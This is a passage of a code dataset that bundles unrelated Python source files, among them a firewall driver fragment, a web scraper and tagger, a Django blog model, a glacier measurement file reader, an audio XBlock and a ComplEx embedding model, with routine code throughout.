self._set_firewall_status(context, fw)\n\n def remove_rule(self, context, fwp, fwr, fw_list):\n for fw_id in fw_list:\n self._add_task(context, va_consts.ACT_DELETE_FIREWALL_RULE, fw_id,\n {'rule': fwr})\n fw = self.plugin._get_firewall(context, fw_id)\n self._set_firewall_status(context, fw)\n","sub_path":"neutron/plugins/varmour/varmour_fw_driver.py","file_name":"varmour_fw_driver.py","file_ext":"py","file_size_in_byte":7507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"551622002","text":"from dvc.command.common.base import CmdBase\nfrom dvc.git_wrapper import GitWrapper\n\n\nclass CmdShowWorkflow(CmdBase):\n def run(self):\n target = self.args.target\n if not target:\n target = self.project.config._config['Global'].get('Target', '')\n self.project.logger.debug(u'Set show workflow target as {}'.format(target))\n\n wf = GitWrapper.get_all_commits(target, self.settings)\n wf.build_graph(self.args.dvc_commits,\n self.args.all_commits,\n self.args.max_commits)\n return 0\n","sub_path":"dvc/command/show_workflow.py","file_name":"show_workflow.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"318412063","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 18 12:37:48 2015\n\n@author: sindreno\n\"\"\"\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as Canvas\nfrom matplotlib.figure import Figure\n\nclass MatplotlibWidget(Canvas): \n def __init__(self, parent=None, title='Title', xlabel='Stretch', ylabel='Stress', dpi=100, hold=False):\n super(MatplotlibWidget, self).__init__(Figure())\n self.setParent(parent)\n self.figure = Figure(dpi=dpi)\n self.canvas = Canvas(self.figure)\n\n self.figure.patch.set_facecolor('0.2')\n\n self.theplot = self.figure.add_subplot(111, axisbg='0.3')\n self.theplot.patch.set_facecolor('0.3')\n\n self.theplot.set_title(title)\n self.theplot.set_xlabel(xlabel)\n self.theplot.xaxis.label.set_color('red')\n self.theplot.set_ylabel(ylabel)\n self.theplot.yaxis.label.set_color('red')\n\n self.theplot.spines['bottom'].set_color('red')\n self.theplot.spines['left'].set_color('red')\n\n self.theplot.tick_params(axis='x', colors='red')\n self.theplot.tick_params(axis='y', colors='red')\n\n \n def plotDataPoints(self, x, y):\n self.theplot.plot(x,y)\n self.draw() ","sub_path":"Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"211722295","text":"import string\nimport os\nimport re\nimport joblib\n\nimport pandas as pd \nimport numpy as np\n\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\ndef test_webscraper_function(url):\n import selenium\n import bs4\n from bs4 import BeautifulSoup\n from selenium import webdriver\n\n # Getting Pages\n driver = webdriver.Chrome('project_high/Model/chromedriver.exe')\n driver.get(url)\n res = driver.execute_script(\"return document.documentElement.outerHTML\")\n driver.quit()\n\n # Parse Page\n soup = BeautifulSoup(res, 'lxml')\n\n # Text\n para = soup.findAll('p')\n text = ''\n for p in para:\n text = text + ' ' + p.getText()\n # text = text_processor(text)\n\n try:\n name = soup.find('h1').getText()\n except:\n name = 'None'\n\n return text, name\n\ndef clean_text(text):\n text = re.sub(\"\\'\", \"\", text) \n text = re.sub(\"[^a-zA-Z]\",\" \",text) \n text = ' '.join(text.split()) \n text = text.lower() \n\n ps = PorterStemmer()\n _t = \"\"\n for t in text.split():\n _t += ps.stem(t) + \" \"\n text = _t\n\n stop_words = set(stopwords.words('english'))\n no_stopword_text = [w for w in text.split() if not w in stop_words]\n clean_text = ' '.join(no_stopword_text)\n\n # return text\n return clean_text\n\ndef text_return_tags(text, title):\n # clean text\n cleaned_text = clean_text(text)\n\n # corpus load as model_data.csv\n corpora_data = pd.read_csv('project_high/Model/model-data.csv')\n\n # tfidf vectorizer on corpus\n tfidf_vect = TfidfVectorizer(max_df=0.8, max_features=1000)\n tfidf_vect.fit_transform(corpora_data['Text'])\n \n # tfidf transform on new text\n text_ft = tfidf_vect.transform([cleaned_text])\n\n # load features\n ml_features = []\n ml_features_models = []\n for file in os.scandir(path='project_high/Model/model_pickle_files'):\n ml_features.append(file.name[:-4]) \n ml_features_models.append(joblib.load('project_high/Model/model_pickle_files/' + file.name))\n\n # predict tags\n tag_list = []\n ps = PorterStemmer()\n _t = \"\"\n for t in title.split():\n _t += ps.stem(t) + \" \"\n title = _t\n for model_index in range(0, len(ml_features_models)):\n if ml_features[model_index] in title:\n if ml_features[model_index] in title or ps.stem(ml_features[model_index]) in title:\n continue\n else:\n tag_list.append(ml_features[model_index])\n else:\n y_pred = ml_features_models[model_index].predict(text_ft)\n if y_pred == 1:\n tag_list.append(ml_features[model_index])\n\n # suggest extra\n # --option for extra tags available\n # --multiprocessing\n\n # return tags\n return tag_list\n\ntext, title = test_webscraper_function('https://uxdesign.cc/make-sense-of-rounded-corners-on-buttons-dfc8e13ea7f7')\nprint(text_return_tags(text, title))","sub_path":"project_high/Model/refer.py","file_name":"refer.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"476089162","text":"import mechanicalsoup\nimport random\nimport webbrowser\nimport time\nfrom os import system\n#system(\"title \"+\"Sick_Yt_Random_Things_Player\")\n\nbr=mechanicalsoup.StatefulBrowser()\n\nwhile True:\n\tlinks = []\n\tterm = str(input(\"Search for \"))\n\tterm.replace(' ','+')\n\tbr.open(\"https://www.youtube.com/results?search_query=\"+term)\n\tresp = br.get_current_page()\n\tcount = 0\n\t#print(resp.text)\n\tprint(\"What I've found:\")\n\t#print(resp.text)\n\tfor link in resp.findAll('a',attrs={\"dir\" : \"ltr\"}, href=True ):\n\t\tif(link[\"href\"].split('?')[0] == \"/watch\" and count <= 10):\n\t\t\tcount+=1\n\t\t\tlinks.append((link.text,link[\"href\"]))\n\t\t\tprint(\"{0}.{1}\".format(count,link.text))\n\tif(len(links) != 0):\n\t\t#l = random.choice(links)\n\t\tl = int(input(\"Choose ur beat:\"))\n\t\t#print(\"How about: {0}? (y/n)\".format(links[l][0]))\n\t\t#if(input(\"-> \") == 'y'):\n\t\tprint(\"Playin ' {0}\".format(links[l][0]))\n\t\tgohere = \"https://www.youtube.com\"+str(links[l][1])\n\t\t#print(gohere)\n\t\ttime.sleep(2)\n\t\twebbrowser.open(gohere)\n\t\ttime.sleep(1)\n\telse:\n\t\tprint(\"I'm a shitty ass program and for some god forsaken reason can't load this shit\")\n\t\t#br.refresh()\n\t\t#print(br.get_current_page().prettify())\n","sub_path":"random_yt_link2.py","file_name":"random_yt_link2.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"482419070","text":"import csv\n\ndef main():\n product_dictionary = get_product_dict()\n print(product_dictionary)\n\ndef get_product_dict():\n \n product_dict = {}\n\n with open('products.csv') as products_csv:\n read_products = csv.reader(products_csv)\n next(read_products)\n\n for row in read_products:\n product_info = []\n product_num = row[0]\n product_name = row[1]\n product_info.append(product_name)\n product_price = row[2]\n product_info.append(product_price)\n\n product_dict[product_num] = product_info\n\n\n return product_dict\n\nmain()\n","sub_path":"prove milestone/receipt.py","file_name":"receipt.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"228158719","text":"import json\nimport mysql.connector\n\ndb_connection = mysql.connector.connect(\n host=\"mysql_container\",\n user=\"dev\",\n passwd=\"123456\",\n database=\"devopstt\"\n)\ndb_cursor = db_connection.cursor(dictionary=True)\n\ndef test_version():\n db_cursor.execute(\"SELECT max(version) as version FROM versionTable;\")\n resultVersion = db_cursor.fetchone()\n f = open('expecteddbstate/versionTable.json')\n version = json.load(f)\n assert resultVersion == version\n\ndef test_appTable():\n db_cursor.execute(f\"SELECT * FROM appTable;\")\n result = db_cursor.fetchone()\n fileoutput = open(\"expecteddbstate/appTable.json\")\n test = json.load(fileoutput)\n assert result == test\n\ndef test_someTable():\n db_cursor.execute(f\"SELECT * FROM someTable;\")\n result = db_cursor.fetchone()\n fileoutput = open(\"expecteddbstate/someTable.json\")\n test = json.load(fileoutput)\n assert result == test\n ","sub_path":"test/db_test.py","file_name":"db_test.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"574528154","text":"import csv\nimport os\nimport numpy as np\nimport copy\nimport pickle\nfrom utils import read_csv, write_csv, hashing\nfrom operator import itemgetter\nfrom datetime import datetime, timedelta\nimport pdb\n\n\n'''\nHEADER = ['LOS', 'age_at_admission', 'CHF', 'Arrhy', 'VALVE', 'PULMCIRC',\n 'PERIVASC', 'HTN', 'PARA', 'NEURO', 'CHRNLUNG', 'DM', 'HYPOTHY',\n 'RENLFAIL', 'LIVER', 'ULCER', 'AIDS', 'LYMPH', 'METS', 'TUMOR',\n 'ARTH', 'COAG', 'OBESE', 'WGHTLOSS', 'LYTES', 'BLDLOSS', 'ANEMDEF',\n 'ALCOHOL', 'DRUG', 'PSYCH', 'DEPRESS']\n'''\nHEADER = ['age_at_admission', 'CHF', 'Arrhy', 'VALVE', 'PULMCIRC',\n 'PERIVASC', 'HTN', 'PARA', 'NEURO', 'CHRNLUNG', 'DM', 'HYPOTHY',\n 'RENLFAIL', 'LIVER', 'ULCER', 'AIDS', 'LYMPH', 'METS', 'TUMOR',\n 'ARTH', 'COAG', 'OBESE', 'WGHTLOSS', 'LYTES', 'BLDLOSS', 'ANEMDEF',\n 'ALCOHOL', 'DRUG', 'PSYCH', 'DEPRESS'] # zero-one values\n\nADD_HEADER = ['TOS']\nSTR_HEADER = ['Gender', 'Race2', 'Insurance2'] \nSTR_HEADER_CLASS = [['F', 'M'], \n ['Non-WHITE', 'WHITE'],\n ['Private', 'Public', 'Self']]\n# private: 1 0, public: 0 1, self: 0 0\n\ndir_path = './datasets'\ninput_root = './input_datasets'\ninput_fname = os.path.join(dir_path, '05_converter.pkl')\nicd_fname = os.path.join(input_root, 'icd_code.csv')\noutput_fname = os.path.join(dir_path, '06_feature_eng.pkl')\n\ndef _subset_extractor(records, header):\n subset = []\n for record in records:\n subset_ = {}\n for name in header:\n subset_[name] = record[name]\n subset.append(subset_)\n return subset\n\ndef main():\n icd_codes = read_csv(icd_fname)\n icd_codes = hashing(icd_codes, 'ICUSTAY_ID')\n\n with open(input_fname, 'rb') as fp:\n records = pickle.load(fp)\n\n mats = records['mats']\n labels = records['ys']\n\n xs = [] # static features\n ys = [] # case/control\n icustay_id = []\n for key, data in mats.items():\n avg = np.mean(data, axis=0)\n std = np.std(data, axis=0)\n max_val = np.max(data, axis=0)\n min_val = np.min(data, axis=0)\n\n icd_code = icd_codes[key]\n assert len(icd_code) == 1\n _icd_code = icd_code[0]\n icd_code = [_icd_code[name] for name in HEADER]\n icd_code += [str(data.shape[0])]\n for _i in range(len(STR_HEADER)-1):\n # only for gender and race\n c = STR_HEADER_CLASS[_i].index(_icd_code[STR_HEADER[_i]])\n icd_code.extend([str(c)])\n\n if _icd_code['Insurance2']=='Private':\n icd_code.extend(['1', '0'])\n elif _icd_code['Insurance2']=='Public':\n icd_code.extend(['0', '1'])\n else:\n icd_code.extend(['0', '0'])\n\n #feat = np.concatenate((avg, std, max_val, min_val, [float(icd_code[0])]))\n feat = np.concatenate((avg, std, max_val, min_val, icd_code))\n xs.append(np.expand_dims(feat, axis=0))\n\n if labels[key] == 'control':\n ys.append(0)\n elif labels[key] == 'case':\n ys.append(1)\n else:\n raise ValueError()\n \n icustay_id.append(key)\n\n cs = np.zeros(len(feat), dtype=int)\n cs[-(len(icd_code)-1):] = 1 # if its categorical (1) or not (0)\n xs = np.concatenate(xs, axis=0)\n ys = np.asarray(ys)\n\n print(xs.shape, ys.shape)\n data = {\n 'xs': xs,\n 'cs': cs,\n 'ys': ys,\n 'icustay_id': icustay_id,\n }\n print('ratio: %.4f'%(np.sum(ys==1) / len(ys)))\n print(xs[0], ys[0])\n print(xs[-1], ys[1])\n\n with open(output_fname, 'wb') as fp:\n pickle.dump(data, fp)\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/new_preprocessing/06_feature_eng.py","file_name":"06_feature_eng.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"119373094","text":"#export CUDA_VISIBLE_DEVICES=3\nimport os\n\nif os.path.exists('.local'):\n\tdata_dir = '/home/andrei/work/t7/splited/'\n\tbatch_size = 4\n\tnum_workers = 4\n\ttopk = 2\n\n\tSHOW_BAR = False\n\tDEBUG = True\n\tTOPk = 3\n\nelse:\n\t#data_dir = '/home/andrei/Data/Datasets/Scales/splited/'\n\tdata_dir = '/mnt/lin2/datasets/splited/'\t\n\tbatch_size = 32\n\tnum_workers = 8\t\n\n\tSHOW_BAR = True\n\tDEBUG = False\n\tTOPk = 6\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"174455645","text":"from django.db import models\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.translation import ugettext_noop\nfrom django.utils.translation import ugettext \n\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n\n\n#-----------------------------------------------------------------\n# подписанные пользователи\nclass ReadUser(models.Model):\n class Meta:\n unique_together = (\"user\", \"signuser\")\n index_together = [\"user\", \"signuser\"]\n verbose_name = _('блог пользователя')\n verbose_name_plural = _('1. Блоги пользователей')\n\n user = models.CharField(\n max_length = 30, \n editable=False,\n help_text=_('формируется автоматически'),\n verbose_name=_('пользователь'),)\n signuser = models.ForeignKey(User, \n on_delete=models.CASCADE, \n verbose_name=_('подписанный пользователь'),)\n \n #---------------------------------------------\n def __str__(self):\n #a = self.user\n a = self.signuser.__str__() \n return (\n a\n #+ \", \" + b\n )\n\n\n#-----------------------------------------------------------------\n# посты в блоге\nclass BlogPost(models.Model):\n class Meta:\n index_together = [\"user\"]\n verbose_name = _('пост блога')\n verbose_name_plural = _('2. Посты блога')\n\n user = models.CharField(\n max_length = 30, \n #editable=False,\n help_text=_('формируется автоматически'),\n verbose_name=_('пользователь'),)\n header = models.TextField(\n verbose_name=_('заголовок_'),)\n content = models.TextField(\n verbose_name=_('содержание'),)\n qdate = models.DateTimeField(\n auto_now=True, \n verbose_name=_('дата создания'),)\n\n #---------------------------------------------\n def get_absolute_url(self):\n a = \"/post/%i/\" % self.id\n return a\n\n #---------------------------------------------\n def __str__(self):\n #a = self.user\n a = self.user\n b = self.header \n return (\n a\n + \", \" + b\n #+ \", \" + c\n )\n\n\n#-----------------------------------------------------------------\n# прочитанные посты\nclass ReadPost(models.Model):\n class Meta:\n unique_together = (\"user\", \"post\")\n index_together = [\"user\", \"post\"]\n verbose_name = _('Прочитанный пост')\n verbose_name_plural = _('3. Прочитанные посты')\n\n user = models.CharField(\n max_length = 30, \n editable=False,\n help_text=_('формируется автоматически'),\n verbose_name=_('пользователь'),)\n post = models.ForeignKey(BlogPost, \n on_delete=models.CASCADE, \n verbose_name=_('прочитанный пост'),)\n\n #---------------------------------------------\n def __str__(self):\n #a = self.user\n a = self.user\n b = self.post.__str__() \n return (\n a\n + \", \" + b\n #+ \", \" + c\n )\n\n\n","sub_path":"testblog/blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"71784814","text":" \ndef work(a):\n if(a<-20):\n print('Холодновато')\n elif(a in range(-19,1)):\n print('Не жарко')\n elif(a in range(0,21)):\n print('Сравнительно нормально')\n elif(a in range(25,31)):\n print('Жарковато')\n elif(a>30):\n print('На улице очень жарко')\n\n\ndef is_right(a):\n try:\n a = int(a)\n print(a)\n except ValueError:\n return False\n return a\n \ndef main():\n while True:\n a = input('Введите 1 число ')\n a = is_right(a)\n if(a is False): \n print('Введите корректное число ')\n continue\n work(a)\n asnwer = input(\"Продолжить? (да/нет) \")\n if(asnwer == 'нет'):\n break\nmain()","sub_path":"9/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"417816098","text":"'''\nCreated on 18.05.2018\n\n@author: yvo\n'''\n\nfrom dataflow.DataReaders.VawFileReaders import VawFileReader\nfrom dataflow.DataObjects.LengthChange import LengthChange\n\n\nclass LengthChangeReader(VawFileReader):\n '''\n Specific file reader for length change measurement files used by Andreas Bauder.\n \n Example of typical header line:\n ---\n # Length Change; Allalin; 11; 6.50\n # surv.date; m-code; ref.date; lc; clc; h_min; observer\n # dt:ddmmyyyy; ; dt:ddmmyyyy; (m); (m); (m asl);\n ---\n \n Attributes:\n - ___NUMBER_HEADER_LINES Number of header lines used in the length change file.\n '''\n\n ___NUMBER_HEADER_LINES = 3\n\n def __init__(self, fullFileName):\n '''\n Constructor of the class.\n \n @type fullFileName: string\n @param fullFileName: Absolute file path.\n '''\n \n super().__init__(fullFileName)\n \n # Setting the parameters of the data file.\n self._numberHeaderLines = self.___NUMBER_HEADER_LINES\n #self._headerLineContent[3] = \"Length change (can be ignored)\"\n \n def parse(self):\n '''\n Starts the parsing of the given file. The parser runs through the entire file\n and collects the individual length change measurements.\n Each line of a length change measurement will be converted into a \n DataObjects.LengthChange.LengthChange object.\n \n Only measurements which are measured, reconstructed or observed are included.\n \n The individual measurements are included into a list containing the entire \n time series of the length change measurement of the glacier as given in the file.\n \n @rtype: List of DataObjects.LengthChange.LengthChange objects\n @return: Entire time series of the length changes of the glacier.\n '''\n \n lengthChangeList = []\n \n with open(self._fullFileName, \"r\") as lc:\n\n lineCounter = 0\n\n for line in lc:\n\n lineCounter += 1\n \n try:\n \n if lineCounter > self._NUMBER_HEADER_LINES:\n data = self._getData(line)\n\n if data[4] == \"m\" or data[4] == \"r\" or data[4] == \"o\":\n\n lengthChange = LengthChange(None, \n data[0], data[1], \n data[2], data[3],\n data[4], \n data[5], \"\",\n data[6], \n data[7],\n \"\")\n \n lengthChangeList.append(lengthChange)\n \n self._glacier.addLengthChange(lengthChange)\n \n \n except Exception as e:\n\n errorMessage = \"{0} @ {1}: {2}\".format(lc, lineCounter, e)\n print(errorMessage)\n \n return lengthChangeList\n \n def _getData(self, dataLine):\n '''\n Helper function to retrieve all information of a single length change measurement line.\n \n Each parameter stored in the text file will be parsed and converted into an appropriate type.\n \n @type dataLine: string\n @param dataLine: Entire line with a measurement of the text file.\n \n @rtype: Array\n @return: Converted data of one length change measurement.\n '''\n \n dateToReformated = self._reformateDate(dataLine[:10])\n dateFromReformated = self._reformateDate(dataLine[16:26])\n dateTo = dateToReformated[0]\n dateToQuality = dateToReformated[1]\n dateFrom = dateFromReformated[0]\n dateFromQuality = dateFromReformated[1]\n \n measurementType = dataLine[12:13]\n \n variationQuantitative = float(dataLine[26:37].strip())\n \n elevationMin = \"\"\n elevationMinTemp = dataLine[42:54].strip()\n if elevationMinTemp != \"NaN\":\n try:\n elevationMin = float(elevationMinTemp)\n except:\n elevationMin = \"\"\n \n observer = \"\"\n observerTemp = dataLine[54:].strip()\n if observerTemp != \"-\":\n observer = observerTemp\n \n return [dateFrom, dateFromQuality, dateTo, dateToQuality, measurementType, variationQuantitative, elevationMin, observer]","sub_path":"dataflow/DataReaders/VawFileReaders/LengthChangeReader.py","file_name":"LengthChangeReader.py","file_ext":"py","file_size_in_byte":4651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"331691148","text":"from itertools import zip_longest\nfrom typing import Iterable\n\nimport colorama\n\n\ndef diffprint(x, y):\n \"\"\"Print elements or lists x and y, with differences in red\"\"\"\n\n def _diffprint(x, y):\n if x != y:\n print(colorama.Fore.RED, x, y, colorama.Fore.RESET)\n else:\n print(x, y)\n\n if isinstance(x, Iterable):\n for xe, ye in zip_longest(x, y):\n _diffprint(xe, ye)\n else:\n _diffprint(x, y)\n\n\ndef unzip(l):\n return zip(*l)\n","sub_path":"qurator/dinglehopper/tests/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"331244210","text":"# -*- coding: utf-8 -*-\nimport logging\n\nfrom xblock.core import XBlock\nfrom xblock.fragment import Fragment\nfrom xblockutils.studio_editable import StudioEditableXBlockMixin\nfrom xblockutils.resources import ResourceLoader\n\nfrom .fields import AudioFields\nfrom .utils import get_path_mimetype\n\n\nlog = logging.getLogger(__name__)\nloader = ResourceLoader(__name__)\n\n\n@XBlock.needs('i18n')\nclass AudioBlock(AudioFields, StudioEditableXBlockMixin, XBlock):\n # Styling and asset controls.\n icon_class = 'audio'\n js_module_name = \"Audio\"\n\n editable_fields = ('sources', 'allow_audio_download')\n\n\n def student_view(self, context):\n \"\"\"\n Player view, displayed to the student\n \"\"\"\n\n sources = filter(None, self.sources.split('\\n')) if self.sources else ''\n audio_download_url = sources[0] if sources else None\n\n # Add the MIME type if we think we know it.\n annotated_sources = []\n for source in sources:\n type = get_path_mimetype(source)\n\n annotated_sources.append((source, type))\n\n fragment = Fragment()\n fragment.add_content(loader.render_mako_template(\n 'templates/html/audio.html', {\n 'audio_id': self.audio_id,\n 'sources': annotated_sources,\n 'allow_audio_download': self.allow_audio_download,\n 'audio_download_url': audio_download_url\n }))\n fragment.add_css_url(self.runtime.local_resource_url(self, 'public/css/audio.css'))\n fragment.add_css_url(self.runtime.local_resource_url(self, 'public/css/mediaelement.player.min.css'))\n fragment.add_javascript_url(self.runtime.local_resource_url(self, 'public/js/mediaelement.player.min.js'))\n fragment.add_javascript_url(self.runtime.local_resource_url(self, 'public/js/audio.js'))\n fragment.initialize_js(\"AudioBlock\")\n\n return fragment\n","sub_path":"audio/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"3526641","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nfrom pykg2vec.core.KGMeta import ModelMeta\n\n\nclass Complex(ModelMeta):\n \"\"\"\n ------------------Paper Title-----------------------------\n Complex Embeddings for Simple Link Prediction\n ------------------Paper Authors---------------------------\n Theo Trouillon ´\n 1,2 THEO.TROUILLON@XRCE.XEROX.COM\n Johannes Welbl3\n J.WELBL@CS.UCL.AC.UK\n Sebastian Riedel3\n S.RIEDEL@CS.UCL.AC.UK\n Eric Gaussier ´ 2 ERIC.GAUSSIER@IMAG.FR\n Guillaume Bouchard3 G.BOUCHARD@CS.UCL.AC.UK\n 1 Xerox Research Centre Europe, 6 chemin de Maupertuis, 38240 Meylan, FRANCE\n 2 Universite Grenoble Alpes, 621 avenue Centrale, 38400 Saint Martin d’H ´ eres, FRANCE `\n 3 University College London, Gower St, London WC1E 6BT, UNITED KINGDOM\n ------------------Summary---------------------------------\n ComplEx is an enhanced version of DistMult in that it uses complex-valued embeddings\n to represent both entities and relations. Using the complex-valued embedding allows\n the defined scoring function in ComplEx to differentiate that facts with assymmetric relations.\n \"\"\"\n\n def __init__(self, config=None):\n self.config = config\n self.data_stats = self.config.kg_meta\n self.tot_ent = self.data_stats.tot_entity\n self.tot_rel = self.data_stats.tot_relation\n self.model_name = 'Complex'\n\n def def_inputs(self):\n self.h = tf.placeholder(tf.int32, [None])\n self.r = tf.placeholder(tf.int32, [None])\n self.t = tf.placeholder(tf.int32, [None])\n self.hr_t = tf.placeholder(tf.float32, [None, self.data_stats.tot_entity])\n self.rt_h = tf.placeholder(tf.float32, [None, self.data_stats.tot_entity])\n\n self.test_h_batch = tf.placeholder(tf.int32, [None])\n self.test_r_batch = tf.placeholder(tf.int32, [None])\n self.test_t_batch = tf.placeholder(tf.int32, [None])\n\n def def_parameters(self):\n k = self.config.hidden_size\n with tf.name_scope(\"embedding\"):\n self.emb_e_real = tf.get_variable(name=\"emb_e_real\", shape=[self.tot_ent, k],\n initializer=tf.contrib.layers.xavier_initializer(uniform=False))\n self.emb_e_img = tf.get_variable(name=\"emb_e_img\", shape=[self.tot_ent, k],\n initializer=tf.contrib.layers.xavier_initializer(uniform=False))\n self.emb_rel_real = tf.get_variable(name=\"emb_rel_real\", shape=[self.tot_rel, k],\n initializer=tf.contrib.layers.xavier_initializer(uniform=False))\n self.emb_rel_img = tf.get_variable(name=\"emb_rel_img\", shape=[self.tot_rel, k],\n initializer=tf.contrib.layers.xavier_initializer(uniform=False))\n\n self.parameter_list = [self.emb_e_real, self.emb_e_img, self.emb_rel_real, self.emb_rel_img]\n\n def def_loss(self):\n h_emb_real, h_emb_img, r_emb_real, r_emb_img, t_emb_real, t_emb_img = self.embed(self.h, self.r, self.t)\n\n h_emb_real, r_emb_real, t_emb_real = self.layer(h_emb_real, r_emb_real, t_emb_real)\n h_emb_img, r_emb_img, t_emb_img = self.layer(h_emb_img, r_emb_img, t_emb_img)\n\n h_emb_real = tf.squeeze(h_emb_real)\n r_emb_real = tf.squeeze(r_emb_real)\n t_emb_real = tf.squeeze(t_emb_real)\n h_emb_img = tf.squeeze(h_emb_img)\n r_emb_img = tf.squeeze(r_emb_img)\n t_emb_img = tf.squeeze(t_emb_img)\n\n realrealreal = tf.matmul(h_emb_real * r_emb_real,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n realimgimg = tf.matmul(h_emb_real * r_emb_img,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n imgrealimg = tf.matmul(h_emb_img * r_emb_real,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n imgimgreal = tf.matmul(h_emb_img * r_emb_img,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n\n pred = realrealreal + realimgimg + imgrealimg - imgimgreal\n pred_heads = tf.nn.sigmoid(pred)\n\n realrealreal = tf.matmul(t_emb_real * r_emb_real,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n realimgimg = tf.matmul(t_emb_real * r_emb_img,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n imgrealimg = tf.matmul(t_emb_img * r_emb_real,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n imgimgreal = tf.matmul(t_emb_img * r_emb_img,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n\n pred = realrealreal + realimgimg + imgrealimg - imgimgreal\n pred_tails = tf.nn.sigmoid(pred)\n\n hr_t = self.hr_t * (1.0 - self.config.label_smoothing) + 1.0 / self.data_stats.tot_entity\n rt_h = self.rt_h * (1.0 - self.config.label_smoothing) + 1.0 / self.data_stats.tot_entity\n\n loss_tails = tf.reduce_mean(tf.keras.backend.binary_crossentropy(hr_t, pred_tails))\n loss_heads = tf.reduce_mean(tf.keras.backend.binary_crossentropy(rt_h, pred_heads))\n\n # reg_losses = tf.nn.l2_loss(self.E) + tf.nn.l2_loss(self.R) + tf.nn.l2_loss(self.W)\n\n self.loss = loss_heads + loss_tails # + self.config.lmbda * reg_losses\n\n def def_layer(self):\n self.inp_drop = tf.keras.layers.Dropout(rate=self.config.input_dropout)\n\n def layer(self, h, r, t):\n h = tf.squeeze(h)\n r = tf.squeeze(r)\n t = tf.squeeze(t)\n\n h = self.inp_drop(h)\n r = self.inp_drop(r)\n t = self.inp_drop(t)\n\n return h, r, t\n\n def test_batch(self):\n h_emb_real, h_emb_img, r_emb_real, r_emb_img, t_emb_real, t_emb_img = self.embed(self.test_h_batch,\n self.test_r_batch,\n self.test_t_batch)\n\n h_emb_real, r_emb_real, t_emb_real = self.layer(h_emb_real, r_emb_real, t_emb_real)\n h_emb_img, r_emb_img, t_emb_img = self.layer(h_emb_img, r_emb_img, t_emb_img)\n\n h_emb_real = tf.squeeze(h_emb_real)\n r_emb_real = tf.squeeze(r_emb_real)\n t_emb_real = tf.squeeze(t_emb_real)\n h_emb_img = tf.squeeze(h_emb_img)\n r_emb_img = tf.squeeze(r_emb_img)\n t_emb_img = tf.squeeze(t_emb_img)\n\n realrealreal = tf.matmul(h_emb_real * r_emb_real,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n realimgimg = tf.matmul(h_emb_real * r_emb_img,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n imgrealimg = tf.matmul(h_emb_img * r_emb_real,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n imgimgreal = tf.matmul(h_emb_img * r_emb_img,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n\n pred_tails = realrealreal + realimgimg + imgrealimg - imgimgreal\n pred_tails = tf.nn.sigmoid(pred_tails)\n\n realrealreal = tf.matmul(t_emb_real * r_emb_real,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n realimgimg = tf.matmul(t_emb_real * r_emb_img,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n imgrealimg = tf.matmul(t_emb_img * r_emb_real,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n imgimgreal = tf.matmul(t_emb_img * r_emb_img,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n\n 